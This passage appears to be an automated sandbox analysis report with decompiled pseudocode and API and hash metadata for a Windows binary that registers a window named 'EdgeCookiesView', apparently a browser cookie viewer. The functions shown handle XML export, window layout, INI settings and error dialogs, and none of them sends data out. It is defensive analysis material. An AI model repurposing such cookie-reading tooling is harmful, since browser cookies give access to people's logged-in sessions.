                                                                                                                                                      						_t46 = _t46 + 0x24;
                                                                                                                                                      						E00408857(__edi,  *((intOrPtr*)(__edi + 0x6c)), _a4,  *((intOrPtr*)(__edi + 0x70)));
                                                                                                                                                      						_t37 = _t37 + 1;
                                                                                                                                                      					} while (_t37 <  *((intOrPtr*)(__edi + 0x34)));
                                                                                                                                                      				}
                                                                                                                                                      				return E00408857(_t40, _t38, _a4, L"</item>\r\n");
                                                                                                                                                      			}












                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00408E9C
                                                                                                                                                        • Part of subcall function 0040DBDA: memcpy.MSVCRT ref: 0040DC57
                                                                                                                                                        • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                        • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                      • _snwprintf.MSVCRT ref: 00408EE6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                      • Opcode ID: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                      • Instruction ID: 8f4cdbf62ca08d82a34ba29bd692b6b076faad5caef0efcefbde8902b8c83394
                                                                                                                                                      • Opcode Fuzzy Hash: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                      • Instruction Fuzzy Hash: BC11BF32A0021ABBDB11BF25CD86E997B25BF04308F00407AF945776A2C739B864DBD8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BA94(void* __esi) {
                                                                                                                                                      				struct _WNDCLASSW _v44;
                                                                                                                                                      				struct HINSTANCE__* _t20;
                                                                                                                                                      				struct HWND__* _t23;
                                                                                                                                                      
                                                                                                                                                      				_v44.style = 0;
                                                                                                                                                      				_v44.lpfnWndProc = E00401896;
                                                                                                                                                      				_v44.cbClsExtra = 0;
                                                                                                                                                      				_v44.cbWndExtra = 0;
                                                                                                                                                      				_v44.hInstance = GetModuleHandleW(0);
                                                                                                                                                      				_v44.hIcon =  *((intOrPtr*)(__esi + 0x204));
                                                                                                                                                      				_v44.lpszClassName = __esi + 4;
                                                                                                                                                      				_v44.hCursor = 0;
                                                                                                                                                      				_v44.hbrBackground = 0x10;
                                                                                                                                                      				_v44.lpszMenuName = 0;
                                                                                                                                                      				RegisterClassW( &_v44);
                                                                                                                                                      				_t20 = GetModuleHandleW(0);
                                                                                                                                                      				_t23 = CreateWindowExW(0, L"EdgeCookiesView", L"EdgeCookiesView", 0xcf0000, 0x80000000, 0x80000000, 0x280, 0x1e0, 0, 0, _t20, __esi);
                                                                                                                                                      				 *(__esi + 0x208) = _t23;
                                                                                                                                                      				return _t23;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,74784E00,00000000), ref: 0040BAB5
                                                                                                                                                      • RegisterClassW.USER32 ref: 0040BADA
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040BAE1
                                                                                                                                                      • CreateWindowExW.USER32 ref: 0040BB05
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                      • String ID: EdgeCookiesView
                                                                                                                                                      • API String ID: 2678498856-2656830938
                                                                                                                                                      • Opcode ID: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                      • Instruction ID: 27e191b6334208d49ef5ca2aa5ba4bd18f44ae4e1b08ed08d13d2dfcc62d9bb3
                                                                                                                                                      • Opcode Fuzzy Hash: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                      • Instruction Fuzzy Hash: 3A01C8B1900208AFD711DF9A8D85AFFFBFCEB88710F10402AE915F2251D7B459458BA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E00406DE5(void* __eflags, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12) {
                                                                                                                                                      				void _v8198;
                                                                                                                                                      				short _v8200;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      
                                                                                                                                                      				E0040E340(0x2004, _t18);
                                                                                                                                                      				_v8200 = _v8200 & 0x00000000;
                                                                                                                                                      				memset( &_v8198, 0, 0x2000);
                                                                                                                                                      				GetPrivateProfileStringW(0x412e48, _a4, 0x40f454,  &_v8200, 0x1000, 0x412c38);
                                                                                                                                                      				if(_v8200 == 0 || _a12 != 0) {
                                                                                                                                                      					return WritePrivateProfileStringW(0x412e48, _a4, _a8, 0x412c38);
                                                                                                                                                      				} else {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00406E0A
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00406E32
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00412E48,?,?,00412C38), ref: 00406E54
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileString$Writememset
                                                                                                                                                      • String ID: 8,A$H.A
                                                                                                                                                      • API String ID: 747731527-1209539780
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 38%
                                                                                                                                                      			E004053B1(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                      				char _v2052;
                                                                                                                                                      				short _v4100;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				long _t15;
                                                                                                                                                      				long _t16;
                                                                                                                                                      
                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                      				E0040E340(0x1000, __ecx);
                                                                                                                                                      				_t16 = _t15;
                                                                                                                                                      				if(_t16 == 0) {
                                                                                                                                                      					_t16 = GetLastError();
                                                                                                                                                      				}
                                                                                                                                                      				E004052B3(_t16,  &_v2052);
                                                                                                                                                      				_push( &_v2052);
                                                                                                                                                      				_push(_t16);
                                                                                                                                                      				_push(L"Error %d: %s");
                                                                                                                                                      				_push(0x400);
                                                                                                                                                      				_push( &_v4100);
                                                                                                                                                      				L0040DFD6();
                                                                                                                                                      				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74784E00,?), ref: 004053C5
                                                                                                                                                      • _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                      • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E0040DB6F(intOrPtr _a4) {
                                                                                                                                                      				_Unknown_base(*)()* _t3;
                                                                                                                                                      				void* _t7;
                                                                                                                                                      				struct HINSTANCE__* _t8;
                                                                                                                                                      
                                                                                                                                                      				_t7 = 0;
                                                                                                                                                      				_t8 = LoadLibraryW(L"shlwapi.dll");
                                                                                                                                                      				_t3 = GetProcAddress(_t8, "SHAutoComplete");
                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                      					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                                                                      				}
                                                                                                                                                      				FreeLibrary(_t8);
                                                                                                                                                      				return _t7;
                                                                                                                                                      			}







                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(shlwapi.dll,770B48C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
• Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
• Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                      • API String ID: 145871493-1506664499
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406B34(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				struct tagPOINT _v20;
                                                                                                                                                      				struct tagRECT _v36;
                                                                                                                                                      				int _t27;
                                                                                                                                                      				struct HWND__* _t31;
                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                      
                                                                                                                                                      				_t31 = _a4;
                                                                                                                                                      				if((_a8 & 0x00000001) != 0) {
                                                                                                                                                      					_t33 = GetParent(_t31);
                                                                                                                                                      					GetWindowRect(_t31,  &_v20);
                                                                                                                                                      					GetClientRect(_t33,  &_v36);
                                                                                                                                                      					MapWindowPoints(0, _t33,  &_v20, 2);
                                                                                                                                                      					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                                                      					_v20.x = _t27;
                                                                                                                                                      					SetWindowPos(_t31, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                                                      				}
                                                                                                                                                      				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                      					E00405D0F(_t31, 0x400000);
                                                                                                                                                      				}
                                                                                                                                                      				return 1;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      • GetParent.USER32(?), ref: 00406B46
                                                                                                                                                      • GetWindowRect.USER32 ref: 00406B53
                                                                                                                                                      • GetClientRect.USER32 ref: 00406B5E
                                                                                                                                                      • MapWindowPoints.USER32 ref: 00406B6E
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00406B8A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                      • Opcode ID: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                      • Instruction ID: 8e7a0edbc95fdcc56b15363f287b575cc5c7f3f2b2b94fa66e9be29a0ee7bcd8
                                                                                                                                                      • Opcode Fuzzy Hash: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                      • Instruction Fuzzy Hash: 48015732400129ABDB219BA59C49EFFBFBCEF06714F04413AF901F2080D778A5058BA8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E00409F23(void* __eax, int __ebx, void* _a4) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				signed int _t28;
                                                                                                                                                      				void* _t32;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      
                                                                                                                                                      				_t20 = __eax;
                                                                                                                                                      				_v12 = _v12 & 0x00000000;
                                                                                                                                                      				_push(__ebx);
                                                                                                                                                      				_t28 = __eax - 1;
                                                                                                                                                      				L0040E038();
                                                                                                                                                      				_v16 = __eax;
                                                                                                                                                      				if(_t28 > 0) {
                                                                                                                                                      					_t21 = _a4;
                                                                                                                                                      					_v8 = __ebx;
                                                                                                                                                      					_v8 =  ~_v8;
                                                                                                                                                      					_t32 = _t28 * __ebx + _t21;
                                                                                                                                                      					_a4 = _t21;
                                                                                                                                                      					do {
                                                                                                                                                      						memcpy(_v16, _a4, __ebx);
                                                                                                                                                      						memcpy(_a4, _t32, __ebx);
                                                                                                                                                      						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                                                                      						_a4 = _a4 + __ebx;
                                                                                                                                                      						_t32 = _t32 + _v8;
                                                                                                                                                      						_t34 = _t34 + 0x24;
                                                                                                                                                      						_v12 = _v12 + 1;
                                                                                                                                                      						_t28 = _t28 - 1;
                                                                                                                                                      					} while (_t28 > _v12);
                                                                                                                                                      				}
                                                                                                                                                      				_push(_v16);
                                                                                                                                                      				L0040E032();
                                                                                                                                                      				return _t20;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$??2@??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1252195045-0
                                                                                                                                                      • Opcode ID: b86c0dfcea20ed5943c2189175d4b50205f28c5c643965f5f8caf492287ebdb1
                                                                                                                                                      • Instruction ID: 9c944120e002927f8eec2413523e8dcd2a94c32319e751658ec61dd6637171fa
                                                                                                                                                      • Opcode Fuzzy Hash: b86c0dfcea20ed5943c2189175d4b50205f28c5c643965f5f8caf492287ebdb1
                                                                                                                                                      • Instruction Fuzzy Hash: C0012172C00118BBDF106FAAD8819DEBFB9EF44394F10807AF808B6152D6755E559B98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E0040768E(void* __esi) {
                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                      				intOrPtr _t10;
                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                      				intOrPtr* _t18;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      
                                                                                                                                                      				_t19 = __esi;
                                                                                                                                                      				_t9 =  *((intOrPtr*)(__esi + 0x38));
                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                      					_push(_t9);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				_t10 =  *((intOrPtr*)(_t19 + 0x48));
                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                      					_push(_t10);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				_t11 =  *((intOrPtr*)(_t19 + 0x2e4));
                                                                                                                                                      				if(_t11 != 0) {
                                                                                                                                                      					_push(_t11);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				_t18 =  *((intOrPtr*)(_t19 + 0x2cc));
                                                                                                                                                      				if(_t18 != 0) {
                                                                                                                                                      					_t11 =  *_t18;
                                                                                                                                                      					if(_t11 != 0) {
                                                                                                                                                      						_push(_t11);
                                                                                                                                                      						L0040E032();
                                                                                                                                                      						 *_t18 = 0;
                                                                                                                                                      					}
                                                                                                                                                      					_push(_t18);
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				 *((intOrPtr*)(_t19 + 0x2cc)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t19 + 0x38)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t19 + 0x48)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t19 + 0x2e4)) = 0;
                                                                                                                                                      				return _t11;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      • Opcode ID: 215cdfd6d564a20a082406ff577ac5ffa07c94b36e2e8180bf1e91046972ff33
                                                                                                                                                      • Instruction ID: 342c1f177218003cdd1623b0f4e7fc54ae999312f226978e8e9af0a1ecb46938
                                                                                                                                                      • Opcode Fuzzy Hash: 215cdfd6d564a20a082406ff577ac5ffa07c94b36e2e8180bf1e91046972ff33
                                                                                                                                                      • Instruction Fuzzy Hash: F1F03C72949A515BC724AE6ED8C485BB3E9AB043647604C3FF14AE3690CA39BC904A1C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E00403054(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t15;
                                                                                                                                                      				struct HDWP__* _t31;
                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                      				RECT* _t36;
                                                                                                                                                      
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t34 = __ecx;
                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                      				if(_a4 != 5) {
                                                                                                                                                      					if(_a4 != 0xf) {
                                                                                                                                                      						if(_a4 == 0x24) {
                                                                                                                                                      							_t15 = _a12;
                                                                                                                                                      							 *((intOrPtr*)(_t15 + 0x18)) = 0xc8;
                                                                                                                                                      							 *((intOrPtr*)(_t15 + 0x1c)) = 0x78;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						E00401810(__ecx + 0x40);
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_t31 = BeginDeferWindowPos(3);
                                                                                                                                                      					_t36 = _t34 + 0x40;
                                                                                                                                                      					E004017E9(_t36, _t31, 0x3f1, 0, 0, 1);
                                                                                                                                                      					E004017E9(_t36, _t31, 1, 1, 1, 0);
                                                                                                                                                      					E004017E9(_t36, _t31, 2, 1, 1, 0);
                                                                                                                                                      					EndDeferWindowPos(_t31);
                                                                                                                                                      					InvalidateRect( *(_t36 + 0x10), _t36, 1);
                                                                                                                                                      					_t34 = _v8;
                                                                                                                                                      				}
                                                                                                                                                      				return E004015CE(_t34, _a4, _a8, _a12);
                                                                                                                                                      			}











                                                                                                                                                      APIs
                                                                                                                                                      • BeginDeferWindowPos.USER32 ref: 00403068
                                                                                                                                                        • Part of subcall function 004017E9: GetDlgItem.USER32 ref: 004017F2
                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040309E
                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004030A9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DeferWindow$BeginInvalidateItemRect
                                                                                                                                                      • String ID: $
                                                                                                                                                      • API String ID: 4234876885-3993045852
                                                                                                                                                      • Opcode ID: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                      • Instruction ID: 5bd367454bd051cdd9e75425df65f1b17fedc8d2c9609545a756db00ac89be97
                                                                                                                                                      • Opcode Fuzzy Hash: 9f95f7265a4407c1351ad9ebcb6b82dd225c6b4ae57057ea946bec00b32e7224
                                                                                                                                                      • Instruction Fuzzy Hash: 65119171140208FFEB215F51CCC5F6F3AACEB05799F10403AF5053A1D0D675AE459BA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E00409457(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                      				void _v514;
                                                                                                                                                      				signed short _v516;
                                                                                                                                                      				void _v1026;
                                                                                                                                                      				signed short _v1028;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                      				signed short* _t28;
                                                                                                                                                      
                                                                                                                                                      				_v516 = _v516 & 0x00000000;
                                                                                                                                                      				_t26 = __ecx;
                                                                                                                                                      				memset( &_v514, 0, 0x1fc);
                                                                                                                                                      				_v1028 = _v1028 & 0x00000000;
                                                                                                                                                      				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                      				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                                                                      				_t28 =  &_v516;
                                                                                                                                                      				E004086F5(_t28, _t17);
                                                                                                                                                      				_push(_t28);
                                                                                                                                                      				_push(L"</%s>\r\n");
                                                                                                                                                      				_push(0xff);
                                                                                                                                                      				_push( &_v1028);
                                                                                                                                                      				L0040DFD6();
                                                                                                                                                      				return E00408857(_t26, _t26, _a4,  &_v1028);
                                                                                                                                                      			}












                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040947B
                                                                                                                                                      • memset.MSVCRT ref: 00409492
                                                                                                                                                        • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                        • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                      • _snwprintf.MSVCRT ref: 004094C1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                      • String ID: </%s>
                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                      • Opcode ID: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                      • Instruction ID: 85b546f447cb05eec590fc4b387cecce4986b1e61cf39ba9e2c32341b3a77f5f
                                                                                                                                                      • Opcode Fuzzy Hash: 8ddce1f62360dacabf53b406146bfe6f6197350877303745630cb16e54be09f3
                                                                                                                                                      • Instruction Fuzzy Hash: AE0186B3E0012966D720BB55CC45FEA767CEF45318F0004BABB09F71C2DB789E558A98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                      			E00406C43(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                      				void _v8198;
                                                                                                                                                      				short _v8200;
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				void* _t12;
                                                                                                                                                      				intOrPtr _t19;
                                                                                                                                                      				intOrPtr _t20;
                                                                                                                                                      
                                                                                                                                                      				_t19 = __ecx;
                                                                                                                                                      				_t9 = E0040E340(0x2004, __ecx);
                                                                                                                                                      				_t20 = _t19;
                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                      					_t20 =  *0x412ec8; // 0x0
                                                                                                                                                      				}
                                                                                                                                                      				_t25 =  *0x412c38;
                                                                                                                                                      				if( *0x412c38 != 0) {
                                                                                                                                                      					_v8200 = _v8200 & 0x00000000;
                                                                                                                                                      					memset( &_v8198, 0, 0x2000);
                                                                                                                                                      					_push(_t20);
                                                                                                                                                      					_t12 = 5;
                                                                                                                                                      					E00406CC6(_t12);
                                                                                                                                                      					if(E00406D72(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                                                                      						SetWindowTextW(_a4,  &_v8200);
                                                                                                                                                      					}
                                                                                                                                                      					return EnumChildWindows(_a4, E00406BAC, 0);
                                                                                                                                                      				}
                                                                                                                                                      				return _t9;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                      • String ID: caption
                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                      • Opcode ID: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                      • Instruction ID: 29de1f336f9b1ad8a88558a0c2ea7e463315901b0f4d8a0f0fc28385d02cb639
                                                                                                                                                      • Opcode Fuzzy Hash: d0d1c183662057111760d53cf79a0ccaff861f51f495aa9ed578fc316b6293da
                                                                                                                                                      • Instruction Fuzzy Hash: 2DF0A472900314AAFB30AB55DD4AF8A3768DB04714F1100B6FA05B71D2D7B8ADA4CA9C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                      			E00405954(struct HWND__* _a4) {
                                                                                                                                                      				void _v514;
                                                                                                                                                      				short _v516;
